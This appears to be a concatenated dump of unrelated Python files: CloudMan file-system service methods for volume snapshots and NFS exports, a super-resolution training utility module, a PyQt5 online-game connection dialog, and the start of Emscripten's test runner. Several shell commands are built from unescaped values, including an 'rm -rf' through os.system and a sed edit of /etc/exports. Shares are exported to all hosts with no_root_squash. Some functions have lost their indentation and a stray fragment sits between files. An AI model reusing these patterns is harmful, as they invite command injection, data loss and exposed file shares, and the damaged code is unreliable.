        # On AWS it is possible to snapshot a volume while it's still
        # attached so do that because it's faster
        detach = False
    # Stop the FS service (optionally leaving volumes attached).
    self.__remove(delete_devices=False, detach=detach)
    snap_ids = []
    # Create a snapshot of the detached volumes
    for vol in self.volumes:
        snap_ids.append(vol.create_snapshot(snap_description=snap_description))
    # After the snapshot is done, add the file system back as a cluster
    # service
    log.debug("{0} snapshot process completed; adding self to the list of master services"
              .format(self.get_full_name()))
    self.state = service_states.UNSTARTED  # Need to reset state so it gets picked up by monitor
    self.app.manager.activate_master_service(self)
    return snap_ids
def _get_attach_device_from_device(self, device):
"""
Get the device a volume is attached as from the volume itself (i.e.,
double check that the ``device`` we have locally is the ``device`` the
cloud middleware sees as well).
If the devices do not match, return ``None``.
"""
for vol in self.volumes:
if device == vol.device:
# This is limited to file systems composed from 1 volume only
return vol.attach_device
return None
def check_and_update_volume(self, device):
    """
    Run an update on the volume, making sure it exists and is attached to
    this instance as ``device``. If not, try to update the reference to self.
    """
    # TODO: Abstract filtering into the cloud interface classes
    # log.debug("Checking if a volume is attached to instance {0} on device {1}"
    #     .format(self.app.cloud_interface.get_instance_id(), device))
    if self.app.cloud_type == "ec2":
        # filtering w/ boto is supported only with ec2
        f = {'attachment.device': device, 'attachment.instance-id':
             self.app.cloud_interface.get_instance_id()}
        vols = self.app.cloud_interface.get_ec2_connection().get_all_volumes(filters=f)
    else:
        # No server-side filtering available; filter client-side instead.
        vols = []
        all_vols = self.app.cloud_interface.get_ec2_connection().get_all_volumes()
        for vol in all_vols:
            if vol.attach_data.instance_id == self.app.cloud_interface.get_instance_id() and \
                    vol.attach_data.device == device:
                vols.append(vol)
    # log.debug("Found these volume(s) during a check: '{0}'".format(vols))
    if len(vols) == 1:
        att_vol = vols[0]
        for vol in self.volumes:  # Currently, bc. only 1 vol can be assoc w/ FS, we'll only deal w/ 1 vol
            if (vol is None and att_vol) or (vol and att_vol and vol.volume_id != att_vol.id):
                log.debug("Discovered a change of vol %s to '%s', attached as device '%s', for FS '%s'"
                          % ([vol.volume_id for vol in self.volumes], att_vol.id, device, self.name))
                vol.update(att_vol)
                # If the new volume does not have tags (clusterName &
                # filesystem), add those
                if not self.app.cloud_interface.get_tag(att_vol, 'clusterName'):
                    self.app.cloud_interface.add_tag(
                        att_vol, 'clusterName', self.app.ud['cluster_name'])
                if not self.app.cloud_interface.get_tag(att_vol, 'filesystem'):
                    self.app.cloud_interface.add_tag(att_vol, 'filesystem', self.name)
                self.app.cloud_interface.add_tag(att_vol, 'Name', self.name)
                # Update cluster configuration (i.e., persistent_data.yaml)
                # in cluster's bucket
                self.app.manager.console_monitor.store_cluster_config()
    else:
        log.warning("Did not find a volume attached to instance '%s' as device '%s', file system "
                    "'%s' (vols=%s)" % (self.app.cloud_interface.get_instance_id(),
                                        device, self.name, vols))
def add_nfs_share(self, mount_point=None, permissions='rw'):
    """
    Share the given/current file system/mount point over NFS. Note that
    if the given mount point already exists in /etc/exports, replace
    the existing line with the line composed within this method.

    :type mount_point: string
    :param mount_point: The mount point to add to the NFS share

    :type permissions: string
    :param permissions: Choose the type of permissions for the hosts
                        mounting this NFS mount point. Use: 'rw' for
                        read-write (default) or 'ro' for read-only

    Returns ``True`` on success, ``False`` on any error.
    """
    log.debug("Will attempt to share mount point {0} over NFS.".format(mount_point))
    try:
        ee_file = '/etc/exports'
        if mount_point is None:
            mount_point = self.mount_point
        # Compose the line that will be put into /etc/exports
        # NOTE: with Spot instances, should we use 'async' vs. 'sync' option?
        # See: http://linux.die.net/man/5/exports
        ee_line = "{mp}\t*({perms},sync,no_root_squash,no_subtree_check)\n"\
            .format(mp=mount_point, perms=permissions)
        # Make sure we manipulate ee_file by a single process at a time
        with flock(self.nfs_lock_file):
            # Determine if the given mount point is already shared
            with open(ee_file) as f:
                shared_paths = f.readlines()
            in_ee = -1  # Index of an existing /etc/exports entry, -1 if none
            hadoo_mnt_point = "/opt/hadoop"
            hadoop_set = False
            for i, sp in enumerate(shared_paths):
                if mount_point in sp:
                    in_ee = i
                if hadoo_mnt_point in sp:
                    hadoop_set = True
            # TODO:: change the following line and make hadoop a file
            # system
            if not hadoop_set:
                # Always ensure the Hadoop directory is exported as well.
                hdp_line = "{mp}\t*({perms},sync,no_root_squash,no_subtree_check)\n"\
                    .format(mp="/opt/hadoop", perms='rw')
                shared_paths.append(hdp_line)
            # If the mount point is already in /etc/exports, replace the existing
            # entry with the newly composed ee_line (thus supporting change of
            # permissions). Otherwise, append ee_line to the end of the
            # file.
            if in_ee > -1:
                shared_paths[in_ee] = ee_line
            else:
                shared_paths.append(ee_line)
            # Write out the newly composed file
            with open(ee_file, 'w') as f:
                f.writelines(shared_paths)
            log.debug("Added '{0}' line to NFS file {1}".format(
                ee_line.strip(), ee_file))
        # Mark the NFS server as being in need of a restart
        self.dirty = True
        return True
    except Exception, e:
        log.error(
            "Error configuring {0} file for NFS: {1}".format(ee_file, e))
        return False
def remove_nfs_share(self, mount_point=None):
"""
Remove the given/current file system/mount point from being shared
over NFS. The method removes the file system's ``mount_point`` from
``/etc/share`` and indcates that the NFS server needs restarting.
"""
try:
ee_file = '/etc/exports'
if mount_point is None:
mount_point = self.mount_point
mount_point = mount_point.replace(
'/', '\/') # Escape slashes for sed
cmd = "sed -i '/^{0}\s/d' {1}".format(mount_point, ee_file)
log.debug("Removing NSF share for mount point {0}; cmd: {1}".format(
mount_point, cmd))
# To avoid race conditions between threads, use a lock file
with flock(self.nfs_lock_file):
run(cmd)
self.dirty = True
return True
except Exception, e:
log.error("Error removing FS {0} share from NFS: {1}".format(
mount_point, e))
return False
def _service_transitioning(self):
    """
    A convenience method indicating if the service is in a transitioning
    state (i.e., ``SHUTTING_DOWN, SHUT_DOWN, UNSTARTED,
    WAITING_FOR_USER_ACTION, CONFIGURING``). Return ``True`` if so,
    ``False`` otherwise.
    """
    transitional_states = (
        service_states.SHUTTING_DOWN,
        service_states.SHUT_DOWN,
        service_states.UNSTARTED,
        service_states.WAITING_FOR_USER_ACTION,
        service_states.CONFIGURING,
    )
    return self.state in transitional_states
def _service_starting(self, wait_period=30):
    """
    A convenience method that checks if a service has been in ``STARTING``
    state too long. ``wait_period`` indicates how many seconds that period is.
    So, if a service is in ``STARTING`` state and has been there for less than
    the ``wait_period``, the method returns ``True`` (i.e., the service IS
    starting). If the service is not in ``STARTING`` state or it's been in
    that state for longer than the ``wait_period``, return ``False``.

    Basically, this method allows a service to remain in ``STARTING`` state
    for some time before actually checking its status - this helps avoid
    brief ``ERROR`` states due to a service not yet been configured.
    """
    # `started_starting` is stamped whenever the state flips to STARTING.
    if self.state == service_states.STARTING and \
            (datetime.utcnow() - self.started_starting).seconds < wait_period:
        log.debug(
            "{0} in '{2}' state for {1} seconds".format(self.get_full_name(),
            (datetime.utcnow() - self.started_starting).seconds, service_states.STARTING))
        return True
    return False
def _update_size(self, cmd=None):
    """
    Update local size fields to reflect the current file system usage.

    The optional ``cmd`` can be specified if the process of obtaining the
    file system size differs from the *standard* one. If provided, the output
    from this command must have the following format: *total used percentage*,
    in bytes. For example: ``11524096 2314808 21%``
    """
    if not cmd:
        # Get the size and usage status for this file system in bytes.
        # Matches df lines whose mount point ends with this FS's name.
        cmd = "df --block-size 1 | grep %s$ | awk '{print $2, $3, $5}'" % self.name
    # Extract size & usage
    try:
        disk_usage = commands.getoutput(cmd)
        if disk_usage:
            disk_usage = disk_usage.split(' ')
            # Expect exactly: total, used, percent
            if len(disk_usage) == 3:
                self.size = disk_usage[0]
                self.size_used = disk_usage[1]
                self.size_pct = disk_usage[2]
        else:
            log.warning("Empty disk usage for FS {0}".format(self.name))
    except Exception, e:
        log.debug("Error updating file system {0} size and usage: {1}".format(
            self.get_full_name(), e))
def _is_mounted(self, mount_point=None):
    """
    Check if the `mount_point` (or `self.mount_point` if the argument is not
    provided) is mounted. Do so by inspecting `/proc/mounts`.

    Returns ``True`` only when /proc/mounts lists exactly this mount point.
    """
    if not mount_point:
        mount_point = self.mount_point
    cmd = ("cat /proc/mounts | grep {0}[[:space:]] | cut -d' ' -f2"
           .format(mount_point))
    mnt_location = misc.getoutput(cmd)
    if mnt_location:
        try:
            if mount_point == mnt_location:
                return True
        # Modernized from the Python 2-only `except Exception, e` form
        # (valid on Python 2.6+ as well).
        except Exception as e:
            log.error("Exception checking if FS {0} is mounted at {1}: {2}"
                      .format(self.name, mount_point, e))
    return False
def status(self):
    """
    Do a status update for the current file system, checking
    if the file system is mounted to a location based on its name.
    Set state to RUNNING if the file system is accessible, otherwise
    set state to ERROR.
    """
    # log.debug("Updating service '%s-%s' status; current state: %s" \
    #     % (self.name, self.name, self.state))
    if self.dirty:
        # First check if the NFS server needs to be restarted but do it one
        # thread at a time
        with flock(self.nfs_lock_file):
            if run(
                "/etc/init.d/nfs-kernel-server restart", "Error restarting NFS server",
                "As part of %s filesystem update, successfully restarted NFS server"
                    % self.name):
                self.dirty = False
    # Transient storage file system has its own process for checking status
    if len(self.transient_storage) > 0:
        for ts in self.transient_storage:
            ts.status()
        return
    # Wait for s3fs to install before checking status
    if len(self.buckets) > 0:
        for b in self.buckets:
            if not b.s3fs_installed:
                return
    # TODO: Move volume-specific checks into volume.py
    if self._service_transitioning():
        pass
    elif self._service_starting():
        pass
    elif self.mount_point is not None:
        mnt_location = commands.getstatusoutput("cat /proc/mounts | grep %s[[:space:]] "
                                                "| cut -d' ' -f1,2" % self.mount_point)
        if mnt_location[0] == 0 and mnt_location[1] != '':
            try:
                device, mnt_path = mnt_location[1].split(' ')
                # Check volume(s) if part of the file system
                if len(self.volumes) > 0:
                    self.check_and_update_volume(
                        self._get_attach_device_from_device(device))
                # Check mount point
                if mnt_path == self.mount_point:
                    self.state = service_states.RUNNING
                    self._update_size()
                else:
                    log.error("STATUS CHECK [FS %s]: Retrieved mount path '%s' "
                              "does not match expected path '%s'" %
                              (self.get_full_name(), mnt_location[1], self.mount_point))
                    self.state = service_states.ERROR
            except Exception as e:
                # BUGFIX: the format string used placeholder {0} twice, so the
                # exception text was never included in the log message.
                log.error("STATUS CHECK: Exception checking status of FS "
                          "'{0}': {1}".format(self.name, e))
                self.state = service_states.ERROR
                log.debug(mnt_location)
        else:
            log.error("STATUS CHECK: File system {0} is not mounted at {1}"
                      .format(self.name, self.mount_point))
            self.state = service_states.ERROR
    else:
        log.debug("Did not check status of filesystem '%s' with mount point '%s' in state '%s'"
                  % (self.name, self.mount_point, self.state))
def add_volume(self, vol_id=None, size=0, from_snapshot_id=None, dot=False, from_archive=None):
    """
    Add a volume device to this file system.

    Each file system is composed of actual devices; otherwise, it's just an
    empty shell/wrapper for what CloudMan considers a file system.
    """
    log.debug("Adding Volume (id={id}, size={size}, snap={snap}) into Filesystem {fs}"
              .format(id=vol_id, size=size, snap=from_snapshot_id, fs=self.get_full_name()))
    new_volume = Volume(self, vol_id=vol_id, size=size,
                        from_snapshot_id=from_snapshot_id, static=dot,
                        from_archive=from_archive)
    self.volumes.append(new_volume)
def add_bucket(self, bucket_name, bucket_a_key=None, bucket_s_key=None):
    """
    Add a bucket to this file system.

    Each file system is composed of actual devices; otherwise, it's just an
    empty shell/wrapper for what CloudMan considers a file system.
    """
    log.debug("Adding Bucket (name={name}) into Filesystem {fs}"
              .format(name=bucket_name, fs=self.get_full_name()))
    bucket = Bucket(self, bucket_name, bucket_a_key, bucket_s_key)
    self.buckets.append(bucket)
def add_transient_storage(self, from_archive=None, persistent=False):
    """
    Add instance's transient storage and make it available over NFS to the
    cluster. All this really does is makes a directory under ``/mnt`` and
    exports it over NFS.
    """
    log.debug("Configuring instance transient storage at {0} with NFS.".format(
        self.mount_point))
    self.kind = 'transient'
    # Data restored from an archive must always survive; otherwise honor
    # the caller's flag.
    if from_archive:
        self.persistent = True
    else:
        self.persistent = persistent
    self.transient_storage.append(TransientStorage(self, from_archive=from_archive))
def add_glusterfs(self, gluster_server, mount_options=None):
    """
    Add a Gluster server (e.g., ``172.22.169.17:/gluster_dir``) to mount the file system from
    """
    log.debug("Adding Gluster server {0} to file system {1}".format(gluster_server, self.name))
    self.kind = 'gluster'
    gluster_mount = MountableFS(self, 'glusterfs', gluster_server,
                                mount_options=mount_options)
    self.gluster_fs = gluster_mount
def add_nfs(self, nfs_server, username=None, pwd=None, mount_options=None):
    """
    Add a NFS server (e.g., ``172.22.169.17:/nfs_dir``) to mount the file system from
    """
    log.debug("Adding NFS server {0} to file system {1}".format(nfs_server, self.name))
    self.kind = 'nfs'
    nfs_mount = MountableFS(self, 'nfs', nfs_server, mount_options=mount_options)
    self.nfs_fs = nfs_mount
|
utility.py | import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
    """Simple accumulating stopwatch: tic/toc measure intervals, hold/release
    accumulate them."""

    def __init__(self):
        self.acc = 0
        self.tic()

    def tic(self):
        # Mark the start of a new measurement interval.
        self.t0 = time.time()

    def toc(self, restart=False):
        # Seconds elapsed since the last tic(); optionally restart the clock.
        elapsed = time.time() - self.t0
        if restart:
            self.t0 = time.time()
        return elapsed

    def hold(self):
        # Fold the current interval into the accumulator.
        self.acc += self.toc()

    def release(self):
        # Return the accumulated time and zero the accumulator.
        total, self.acc = self.acc, 0
        return total

    def reset(self):
        self.acc = 0
class checkpoint():
    """
    Experiment bookkeeping: owns the experiment directory, the running PSNR
    log tensor, the text log file, background image saving, and plotting.
    """

    def __init__(self, args):
        # NOTE(review): assumes args carries load/save/reset/data_test/scale/
        # save_results/multi_scale_infer/rgb_range attributes as produced by
        # the option parser — confirm against the caller.
        self.args = args
        self.ok = True
        self.log = torch.Tensor()  # PSNR history, indexed [epoch, dataset, scale]
        now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
        if not args.load:
            # Fresh run: default the experiment name to a timestamp.
            if not args.save:
                args.save = now
            self.dir = os.path.join('..', 'experiment', args.save)
        else:
            # Resuming: reload the PSNR log from the previous run, if any.
            self.dir = os.path.join('..', 'experiment', args.load)
            if os.path.exists(self.dir):
                try:
                    self.log = torch.load(self.get_path('psnr_log.pt'))
                except RuntimeError:
                    # Fallback for logs saved as TorchScript archives.
                    self.log = torch.jit.load(self.get_path('psnr_log.pt'))
                print('Continue from epoch {}...'.format(len(self.log)))
            else:
                args.load = ''
        if args.reset:
            # Wipe any previous experiment with the same name.
            os.system('rm -rf ' + self.dir)
            args.load = ''
        os.makedirs(self.dir, exist_ok=True)
        os.makedirs(self.get_path('model'), exist_ok=True)
        for d in args.data_test:
            os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
        # Append when resuming an existing log, otherwise start fresh.
        open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
        self.log_file = open(self.get_path('log.txt'), open_type)
        with open(self.get_path('config.txt'), open_type) as f:
            # Record the full configuration for reproducibility.
            f.write(now + '\n\n')
            for arg in vars(args):
                f.write('{}: {}\n'.format(arg, getattr(args, arg)))
            f.write('\n')
        # Number of background image-writer processes (see begin_background).
        self.n_processes = 8
        #self.n_processes = 1

    def get_path(self, *subdir):
        # All experiment artifacts live under self.dir.
        return os.path.join(self.dir, *subdir)

    #def save(self, trainer, epoch, is_best=False):
    #    trainer.model.save(self.get_path('model'), epoch, is_best=is_best)

    def save(self, trainer, epoch, dataset_name, is_best=False, is_latest=False):
        # Persist model weights, loss state/plots, the PSNR plot, optimizer
        # state and the raw PSNR log for this epoch.
        trainer.model.save(self.get_path('model'), epoch, dataset_name, is_best=is_best, is_latest=is_latest)
        trainer.loss.save(self.dir)
        trainer.loss.plot_loss(self.dir, epoch)
        self.plot_psnr(epoch)
        trainer.optimizer.save(self.dir)
        torch.save(self.log, self.get_path('psnr_log.pt'))

    def add_log(self, log):
        # Append one epoch of PSNR measurements to the history tensor.
        self.log = torch.cat([self.log, log])

    def write_log(self, log, refresh=False):
        # Mirror the message to stdout and the on-disk log file.
        print(log)
        self.log_file.write(log + '\n')
        if refresh:
            # Close and reopen to force the buffer to disk.
            self.log_file.close()
            self.log_file = open(self.get_path('log.txt'), 'a')

    def done(self):
        self.log_file.close()

    def plot_psnr(self, epoch):
        # One PDF per test dataset, one curve per super-resolution scale.
        axis = np.linspace(1, epoch, epoch)
        for idx_data, d in enumerate(self.args.data_test):
            label = 'SR on {}'.format(d)
            fig = plt.figure()
            plt.title(label)
            for idx_scale, scale in enumerate(self.args.scale):
                #log_size = self.log[:, idx_data, idx_scale].numpy().shape[0]
                #axis = np.linspace(1, log_size, log_size)
                plt.plot(
                    axis,
                    self.log[:, idx_data, idx_scale].numpy(),
                    label='Scale {}'.format(scale)
                )
            plt.legend()
            plt.xlabel('Epochs')
            plt.ylabel('PSNR')
            plt.grid(True)
            plt.savefig(self.get_path('test_{}.pdf'.format(d)))
            plt.close(fig)

    def begin_background(self):
        # Start n_processes workers that consume (filename, tensor) pairs
        # queued by save_results and write them to disk.
        self.queue = Queue()

        def bg_target(queue):
            while True:
                if not queue.empty():
                    filename, tensor = queue.get()
                    # (None, None) is the shutdown sentinel (see end_background).
                    if filename is None: break
                    #print("filename: ", filename)
                    imageio.imwrite(filename, tensor.numpy())

        self.process = [
            Process(target=bg_target, args=(self.queue,)) \
            for _ in range(self.n_processes)
        ]
        for p in self.process: p.start()

    def end_background(self):
        # One sentinel per worker, drain the queue, then join everyone.
        for _ in range(self.n_processes): self.queue.put((None, None))
        while not self.queue.empty(): time.sleep(1)
        for p in self.process: p.join()

    def save_results(self, dataset, filename, save_list, scale):
        # Queue SR/LR/HR tensors (scaled back to 8-bit HWC) for background writing.
        if self.args.save_results:
            filename = self.get_path(
                'results-{}'.format(dataset.dataset.name),
                '{}_x{}_'.format(filename, scale)
            )
            postfix = ('SR', 'LR', 'HR')
            for v, p in zip(save_list, postfix):
                if self.args.multi_scale_infer and p=='SR':
                    # Multi-scale inference: one SR image per configured scale.
                    for scale_index, sr_image in enumerate(v):
                        #print(v[scale_index].shape)
                        normalized = v[scale_index][0].mul(255 / self.args.rgb_range)
                        tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
                        self.queue.put(('{}x{}m_{}.png'.format(filename, self.args.scale[scale_index], p), tensor_cpu))
                else:
                    normalized = v[0].mul(255 / self.args.rgb_range)
                    tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
                    self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
    """Snap *img* (values in [0, rgb_range]) onto the 256-level grid,
    returning values in the original range."""
    scale = 255 / rgb_range
    quantized = (img * scale).clamp(0, 255).round()
    return quantized / scale
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
    """Compute PSNR (dB) between super-resolved *sr* and ground-truth *hr*.

    Border pixels are shaved before measuring (scale pixels for benchmark
    datasets, scale+6 otherwise). Returns 0 for placeholder single-element
    HR tensors and +inf when the shaved regions are identical.
    """
    if hr.nelement() == 1: return 0
    diff = (sr - hr) / rgb_range
    if dataset and dataset.dataset.benchmark:
        shave = scale
        if diff.size(1) > 1:
            # Benchmark convention: measure on the luma (Y) channel.
            gray_coeffs = [65.738, 129.057, 25.064]
            convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
            diff = diff.mul(convert).sum(dim=1)
    else:
        shave = scale + 6
    valid = diff[..., shave:-shave, shave:-shave]
    mse = valid.pow(2).mean().item()
    if mse == 0:
        # BUGFIX: identical images previously raised a math.log10(0) domain
        # error; PSNR is infinite in that case.
        return float('inf')
    return -10 * math.log10(mse)
def make_optimizer(args, target):
    '''
    Build an optimizer for *target*'s trainable parameters and attach a
    MultiStepLR scheduler to it, wrapped together in a CustomOptimizer that
    can save/load/step both as one object.
    '''
    # optimizer: only parameters that require gradients are optimized.
    trainable = filter(lambda x: x.requires_grad, target.parameters())
    kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}

    # NOTE(review): an unrecognized args.optimizer leaves optimizer_class
    # unbound and raises NameError below — presumably the option parser
    # restricts the choices; confirm.
    if args.optimizer == 'SGD':
        optimizer_class = optim.SGD
        kwargs_optimizer['momentum'] = args.momentum
    elif args.optimizer == 'ADAM':
        optimizer_class = optim.Adam
        kwargs_optimizer['betas'] = args.betas
        kwargs_optimizer['eps'] = args.epsilon
    elif args.optimizer == 'RMSprop':
        optimizer_class = optim.RMSprop
        kwargs_optimizer['eps'] = args.epsilon

    # scheduler: args.decay is a '-'-separated list of milestone epochs.
    milestones = list(map(lambda x: int(x), args.decay.split('-')))
    kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
    scheduler_class = lrs.MultiStepLR

    # The base class is chosen dynamically above, so this wrapper works for
    # SGD, Adam and RMSprop alike.
    class CustomOptimizer(optimizer_class):
        def __init__(self, *args, **kwargs):
            super(CustomOptimizer, self).__init__(*args, **kwargs)

        def _register_scheduler(self, scheduler_class, **kwargs):
            # The scheduler wraps this very optimizer instance.
            self.scheduler = scheduler_class(self, **kwargs)

        def save(self, save_dir):
            torch.save(self.state_dict(), self.get_dir(save_dir))

        def load(self, load_dir, epoch=1):
            self.load_state_dict(torch.load(self.get_dir(load_dir)))
            # Fast-forward the scheduler to the resumed epoch.
            self.scheduler.step(epoch)
            #if epoch > 1:
            #    for _ in range(epoch): self.scheduler.step()

        def get_dir(self, dir_path):
            return os.path.join(dir_path, 'optimizer.pt')

        def schedule(self):
            self.scheduler.step()

        def get_lr(self):
            # NOTE(review): scheduler.get_lr() is deprecated in newer torch in
            # favor of get_last_lr() (commented alternative below) — confirm
            # the torch version in use.
            return self.scheduler.get_lr()[0]
            #return self.scheduler.get_last_lr()[0]

        def get_last_epoch(self):
            return self.scheduler.last_epoch

    optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
    optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
    return optimizer
|
onlineDialog.py | import sys, socket, json, threading
from PyQt5.QtWidgets import QDialog, QLabel, QApplication, QGridLayout, QLineEdit, QSpinBox, QPushButton, QHBoxLayout
from PyQt5.QtCore import QRect, QBasicTimer
from PyQt5.QtGui import QPainter, QColor
class OnlineDialog(QDialog):
    """Modal dialog that collects a server IP, port and table number, then
    connects to the game server on a background thread."""

    IP = ''
    host = 1024  # NOTE(review): named 'host' but used as the TCP port — confirm
    table = 1
    pid = None   # player id; NOTE(review): never assigned elsewhere in this class
    # receiverThread = None
    status = 0
    # 0:connecting 1:waiting 2:my turn

    def __init__(self, sock, connectEvent):
        # connectEvent: callback invoked once the server accepts the join request.
        self.connectEvent = connectEvent
        self.socket = sock
        super().__init__()
        self.initUI()

    def initUI(self):
        # Build the form: IP, port spinbox, table spinbox, Cancel/OK, status label.
        self.setWindowTitle('Get online')
        self.resize(400, 300)  # set dialog size to 400*300
        self.grid = QGridLayout(self)
        self.iplb = QLabel("IP:",self)  # add a label to this dialog
        self.grid.addWidget(self.iplb, 1, 1)
        self.ipEdit = QLineEdit(self)
        self.ipEdit.textChanged[str].connect(self.onChange1)
        self.grid.addWidget(self.ipEdit, 1, 2)
        self.hostlb = QLabel("Host: ",self)  # add a label to this dialog
        self.grid.addWidget(self.hostlb, 2, 1)
        self.hostEdit = QSpinBox(self)
        self.hostEdit.valueChanged.connect(self.onChange2)
        self.hostEdit.setMinimum(1024)  # unprivileged ports only
        # self.hostEdit.setValue(8080)
        self.hostEdit.setMaximum(65535)
        self.grid.addWidget(self.hostEdit, 2, 2)
        # TODO connection password
        # self.pwdlb = QLabel("Password: ",self) # add a label to this dialog
        # self.grid.addWidget(self.pwdlb, 3, 1) # set label position and size
        # self.pwdEdit = QLineEdit(self)
        # self.grid.addWidget(self.pwdEdit)
        self.tablelb = QLabel("Table:", self)
        self.grid.addWidget(self.tablelb, 4, 1)
        self.tableEdit = QSpinBox(self)
        self.tableEdit.valueChanged.connect(self.onChange3)
        self.tableEdit.setMinimum(1)
        self.tableEdit.setMaximum(5)
        self.grid.addWidget(self.tableEdit, 4, 2)
        self.hbox = QHBoxLayout()
        self.grid.addLayout(self.hbox, 5, 2)
        self.hbox.setContentsMargins(180, 0, 0, 0)
        self.cancelButton = QPushButton('Cancel', self)
        self.hbox.addWidget(self.cancelButton)
        self.cancelButton.pressed.connect(self.cancelButtonEvent)
        self.okButton = QPushButton('OK',self)
        self.hbox.addWidget(self.okButton)
        self.okButton.pressed.connect(self.OK)
        self.statusBar = QLabel(self)
        self.grid.addWidget(self.statusBar, 5, 1)
        self.setLayout(self.grid)
        # self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.show()

    def cancelButtonEvent(self):
        # NOTE(review): the bare `self.receiverThread` below is a no-op
        # expression — this handler looks unfinished (no cancellation
        # happens). Also, receiverThread is first assigned in OK(), so
        # pressing Cancel before OK raises AttributeError. Confirm intent.
        if self.receiverThread and self.status == 1:
            self.receiverThread

    def onChange1(self, text):
        # IP line edit changed.
        self.IP = text

    def onChange2(self, text):
        # Port spinbox changed (QSpinBox delivers an int).
        self.host = text

    def onChange3(self, text):
        # Table spinbox changed.
        self.table = text

    def OK(self):
        # Run the connection attempt on a worker thread so the UI stays responsive.
        self.statusBar.setText('Connecting...')
        self.receiverThread = threading.Thread(target=self.receiverThreadFunction)
        self.receiverThread.start()

    def receiverThreadFunction(self):
        # NOTE(review): self.pid defaults to None and is never set to 0 in
        # this class, so the connect loop below appears unreachable — confirm
        # where pid is supposed to be assigned.
        if self.pid == 0:
            while True:
                try:
                    self.socket.connect((self.IP, self.host))
                    print("debug#1")
                    # self.statusBar.setText('Your id:\n'+self.socket.recv(17).decode('utf-8'))
                    # self.pid = self.socket.recv(17).decode('utf-8')
                    # Ask the server to seat us at the chosen table.
                    self.socket.send(json.dumps({"cmd":"a", "table":self.table}).encode('utf-8'))
                    print("debug#2")
                    while True:
                        print("debug#3")
                        get = self.socket.recv(32).decode('utf-8')
                        try:
                            print('debug#4:', get)
                            recv = json.loads(get)
                        except json.decoder.JSONDecodeError:
                            # Partial/garbled frame: keep reading.
                            print('debug#5:', get)
                            continue
                        if recv['cmd'] == 's':
                            # Success: close the dialog and notify the caller.
                            print("done!")
                            self.accept()
                            self.connectEvent()
                            self.status = 1
                            # return
                        elif recv['cmd'] == 'f':
                            # Server refused; reset the socket for a retry.
                            self.statusBar.setText(recv['reason'])
                            self.socket.close()
                            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                            self.receiverThread = None
                            return
                        # break
                except ConnectionRefusedError:
                    # NOTE(review): `recv` is unbound here if the failure
                    # happened before any JSON was parsed — the setText call
                    # below would raise NameError. Confirm and guard.
                    self.statusBar.setText('Connection \nrefused!')
                    self.statusBar.setText(recv['reason'])
                    self.socket.close()
                    self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    self.receiverThread = None
                    return
                except OSError as ex:
                    # NOTE(review): same unbound-`recv` hazard as above.
                    print(str(ex))
                    self.statusBar.setText("OS\nError!")
                    self.statusBar.setText(recv['reason'])
                    self.socket.close()
                    self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    self.receiverThread = None
                    return
                if self.status != 0:
                    break
        if self.status == 1:
            # Waiting state: drain incoming data until it would block.
            while True:
                while True:
                    try:
                        self.socket.recv(8)
                        # TODO receive EOL
                    except BlockingIOError:
                        break
                # TODO return data
# Manual test entry point: show the dialog with a fresh socket and a no-op
# connect callback.
if __name__ == '__main__':
    app = QApplication(sys.argv)
    ex = OnlineDialog(socket.socket(), lambda: 0)
    sys.exit(app.exec_())
threading.Thread() |
runner.py | #!/usr/bin/env python3
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
import sys
# The emscripten test suite explicitly requires python3.6 or above.
if sys.version_info < (3, 6):
    print('error: emscripten requires python 3.6 or above', file=sys.stderr)
    sys.exit(1)
from subprocess import PIPE, STDOUT
from functools import wraps
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import shlex
import shutil
import string
import subprocess
import stat
import tempfile
import time
import unittest
import webbrowser
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, unquote_plus
# Setup
# __rootpath__ is the emscripten checkout root (the parent of this tests/
# directory); adding it to sys.path lets us import the in-tree tools below.
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import clang_native
import jsrun
import parallel_testsuite
from jsrun import NON_ZERO
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, EMXX, DEBUG
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import MACOS, WINDOWS
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, try_delete
from tools.shared import asbytes, Settings
from tools import shared, line_endings, building
def path_from_root(*pathelems):
    """Return an absolute path for *pathelems* under the emscripten checkout root."""
    return os.path.join(__rootpath__, *pathelems)
def delete_contents(pathname):
    """Remove every entry inside *pathname*, leaving the directory itself in place."""
    for entry in os.listdir(pathname):
        try_delete(os.path.join(pathname, entry))
sys.path.append(path_from_root('third_party/websockify'))

logger = logging.getLogger("runner")

# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
